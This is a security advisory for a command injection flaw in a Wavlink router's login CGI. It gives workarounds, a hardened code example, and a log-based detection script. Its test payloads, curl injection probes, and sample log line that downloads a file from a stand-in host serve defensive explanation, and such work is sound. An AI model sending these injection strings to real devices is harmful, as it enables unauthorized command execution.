CVE-2025-10775

4.7 MEDIUM

📋 TL;DR

This CVE describes an OS command injection vulnerability in the Wavlink WL-NU516U1 router (firmware 240425). The 'ipaddr' parameter of the /cgi-bin/login.cgi endpoint is passed into an OS command without sanitisation, so an attacker who can reach the web interface over the network can execute arbitrary commands on the device with the privileges of the web server process. Every device running the affected firmware is exposed.
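To make the bug class concrete, here is an added example (not code from the page, from Wavlink, or from the public PoC) that places a hypothetical vulnerable handler next to a hardened one. The page does not say which OS command the parameter is spliced into; this example assumes a ping, which is a common use of an 'ipaddr' field in router CGIs, and that assumption is labelled in the code. The hardened version rejects anything that is not a strict IP literal and passes the value as an argv element so no shell ever parses it.

```python
"""Added example: command injection through an 'ipaddr' parameter, and the
hardened form. Not the device's real code; the ping command is an assumption
made for illustration (the page only states that the parameter reaches an
OS command)."""
import ipaddress
import subprocess


def build_command_vulnerable(ipaddr: str) -> str:
    """Hypothetical vulnerable pattern: untrusted input concatenated into a
    shell string that would be handed to system(). Anything after ';', '|',
    '&', '`' or inside '$(...)' is executed as a separate command."""
    return "ping -c 1 " + ipaddr


def build_command_hardened(ipaddr: str) -> list:
    """Hardened form: accept only a syntactically valid IPv4/IPv6 literal and
    return an argv list. Raises ValueError on anything else."""
    try:
        parsed = ipaddress.ip_address(ipaddr.strip())
    except ValueError as exc:
        raise ValueError(f"rejected ipaddr: {ipaddr!r}") from exc
    # Use the canonical string form, never the raw input.
    return ["ping", "-c", "1", str(parsed)]


def is_safe_ipaddr(value: str) -> bool:
    """Convenience predicate over the hardened validator."""
    try:
        build_command_hardened(value)
        return True
    except ValueError:
        return False


def run_hardened(ipaddr: str, timeout: float = 5.0) -> int:
    """Execute the validated argv without a shell (a list argument to
    subprocess.run never goes through /bin/sh). Returns ping's exit status."""
    return subprocess.run(build_command_hardened(ipaddr),
                          timeout=timeout, check=False).returncode


if __name__ == "__main__":
    # Constructed payloads in the shape the advisory describes.
    payloads = ["127.0.0.1", "127.0.0.1;echo test", "127.0.0.1|id",
                "`id`", "$(id)", "127.0.0.1 -f"]
    for p in payloads:
        print(f"{p!r:28} vulnerable -> {build_command_vulnerable(p)!r}")
        print(f"{'':28} hardened   -> "
              f"{'accepted' if is_safe_ipaddr(p) else 'rejected'}")
```

The point of the hardened version is type-level validation rather than metacharacter blacklisting: a blacklist misses encodings and shell features the author did not think of, while "is this an IP address" leaves nothing for the shell to interpret, and the argv form removes the shell entirely.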

💻 Affected Systems

Products:
  • Wavlink WL-NU516U1
Versions: Firmware version 240425
Operating Systems: Embedded Linux (router firmware; the device-side workarounds below assume a Linux shell)
Default Config Vulnerable: ⚠️ Yes
Notes: All devices running the vulnerable firmware version are affected. The vulnerability is in the web interface CGI component.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device compromise, allowing an attacker to install a persistent backdoor, intercept or redirect LAN traffic, pivot into the internal network, or enrol the device in a botnet.

🟠

Likely Case

Unauthorized command execution leading to device configuration changes, credential theft, or denial of service.

🟢

If Mitigated

Limited impact if network segmentation prevents router access from untrusted networks.

🌐 Internet-Facing: HIGH - The attack can be launched remotely against any device whose web interface is reachable from the WAN side. Note that the 4.7 score is not consistent with a network-reachable, low-complexity, unauthenticated attack (that combination scores at least 5.3 under CVSS v3.1 even with a single low impact), so check the published CVSS vector before assuming no credentials are needed.
🏢 Internal Only: MEDIUM - Any host on the LAN, including a compromised workstation or IoT device, can reach the management interface and exploit it.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: UNKNOWN
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploit code is publicly available on GitHub. The attack requires network access to the router's web interface; if the CVSS vector turns out to require privileges, the attacker also needs valid (or default) web credentials, which on consumer routers are frequently unchanged.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None available

Restart Required: N/A (no patch available)

Instructions:

No official patch is available and the vendor has not responded to the disclosure. Plan to replace the device; until then, apply the workarounds below.

🔧 Temporary Workarounds

Network Segmentation

Applies to: all

Isolate the router from untrusted networks and restrict access to the management interface. The rules below must run either on the device itself (only possible if you have shell access) or on a firewall in front of it; on a consumer router with no shell, use the router's own remote-management and WAN-access settings to achieve the same effect. Replace 192.0.2.0/24 with your trusted management subnet, and repeat for port 443 if HTTPS management is enabled.

iptables -A INPUT -p tcp --dport 80 -s 192.0.2.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP

Disable Web Interface

Applies to: Linux (device shell)

Remove or neuter the vulnerable CGI if web management is not required. Either command below disables web login entirely, not just the vulnerable parameter, so management must then be done some other way. On most consumer routers the root filesystem is a read-only squashfs image, so the change may fail or will not survive a reboot; the firewall rules above are the more dependable workaround.

chmod 000 /cgi-bin/login.cgi
rm /cgi-bin/login.cgi

🧯 If You Can't Patch

  • Replace affected device with a different model that receives security updates
  • Implement strict network access controls to limit who can reach the router's management interface

🔍 How to Verify

Check if Vulnerable:

Read the firmware version from the web interface (the page suggests http://router-ip/status.cgi) or over SSH if it is enabled. The vulnerable build reports version 240425. Because no fixed version is known, treat any other version as unverified rather than safe.

Check Version:

curl -s http://router-ip/status.cgi | grep -i version

Verify Fix Applied:

Since there is no patch, "fix applied" here means the workaround blocks the endpoint. Only test devices you own or are authorised to assess. A harmless probe: curl 'http://router-ip/cgi-bin/login.cgi?ipaddr=127.0.0.1;echo test'. Command output is usually not reflected in the response, so a timing probe (ipaddr=127.0.0.1;sleep 5, compared against the response time of a plain request) is a more reliable indicator; a firewalled or removed endpoint answers with a connection failure, 403 or 404 instead of a delayed response. The page gives the parameter as a GET query string; if the login form actually submits it by POST, send the same value in the request body.

📡 Detection & Monitoring

Log Indicators:

  • Unusual commands or new processes in the device's system log (if it exports logs at all; most consumer routers do not, so network-side monitoring is the realistic option)
  • Failed or unexpected logins followed by requests that carry shell metacharacters

Network Indicators:

  • HTTP requests to /cgi-bin/login.cgi whose parameters contain shell metacharacters (; | ` & $( ) or their URL-encoded forms (%3B %7C %60 %26 %24%28)
  • Outbound connections from the router to unexpected destinations, in particular HTTP/TFTP fetches shortly after a suspicious request (payload download)

SIEM Query:

source="router_logs" AND uri="/cgi-bin/login.cgi" AND (query CONTAINS ";" OR query CONTAINS "|" OR query CONTAINS "`" OR query CONTAINS "$(" OR query CONTAINS "%3B" OR query CONTAINS "%7C" OR query CONTAINS "%60" OR query CONTAINS "%24%28")
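The pseudo-query above is only as good as the decoding the SIEM applies before matching. As an added example (not from the page and not a vendor tool), the following script runs that detection logic over a few constructed proxy/IDS access-log lines in an Apache-combined-like format: it URL-decodes parameter values (repeatedly, to catch double encoding) before looking for command separators, restricts the match to the vulnerable endpoint to keep noise down, and groups hits by source address so a burst from one host stands out. The log format and addresses are made up for the example; adapt the regex to your own export.

```python
"""Added example: detect injection attempts against /cgi-bin/login.cgi in
access logs. Sample log lines and addresses are constructed for this demo."""
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache-combined-like line: src ident user [ts] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Command separators and substitutions; checked AFTER decoding so that
# %3B / %7C / %60 / %0A do not slip past.
META = re.compile(r'[;|`&\n]|\$\(|\$\{')

TARGET_PATH = "/cgi-bin/login.cgi"

# Constructed sample log (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [18/Sep/2025:10:01:02 +0000] "GET /cgi-bin/login.cgi?ipaddr=192.168.10.1 HTTP/1.1" 200 512
198.51.100.7 - - [18/Sep/2025:10:01:05 +0000] "GET /cgi-bin/login.cgi?ipaddr=127.0.0.1;echo%20test HTTP/1.1" 200 31
198.51.100.7 - - [18/Sep/2025:10:01:06 +0000] "GET /cgi-bin/login.cgi?ipaddr=127.0.0.1%3Bwget%20http://198.51.100.7/x%20-O%20/tmp/x HTTP/1.1" 200 31
192.0.2.10 - - [18/Sep/2025:10:01:09 +0000] "GET /status.cgi HTTP/1.1" 200 2048
198.51.100.7 - - [18/Sep/2025:10:01:12 +0000] "GET /cgi-bin/login.cgi?ipaddr=%60id%60 HTTP/1.1" 500 0
"""


def decode_repeatedly(value: str, rounds: int = 3) -> str:
    """Undo nested percent-encoding (bounded so a pathological input cannot
    loop forever)."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value


def suspicious_params(target: str) -> list:
    """Return [(name, decoded_value)] for parameters of the vulnerable
    endpoint that contain shell metacharacters; [] for anything else."""
    parts = urlsplit(target)
    if parts.path != TARGET_PATH:
        return []
    hits = []
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = decode_repeatedly(raw)
        if META.search(value):
            hits.append((name, value))
    return hits


def scan_log(text: str) -> list:
    """Parse each line and emit an alert dict for every suspicious request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = suspicious_params(m.group("target"))
        if hits:
            alerts.append({"src": m.group("src"), "ts": m.group("ts"),
                           "status": m.group("status"), "params": hits})
    return alerts


def offenders(alerts: list) -> Counter:
    """Count alerts per source address; a burst from one host is the
    'multiple attempts' pattern the indicators above describe."""
    return Counter(a["src"] for a in alerts)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(a["ts"], a["src"], a["status"], a["params"])
    print("per-source:", dict(offenders(found)))
```

The path restriction is deliberate: a bare metacharacter match across every URL on a busy proxy drowns analysts in false positives, while the same match scoped to the one CGI the advisory names is a high-signal rule. Keep the status code in the alert; a 200 on a payload request suggests the command ran, and a 500 or a delayed response is worth correlating with the router's outbound connections.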
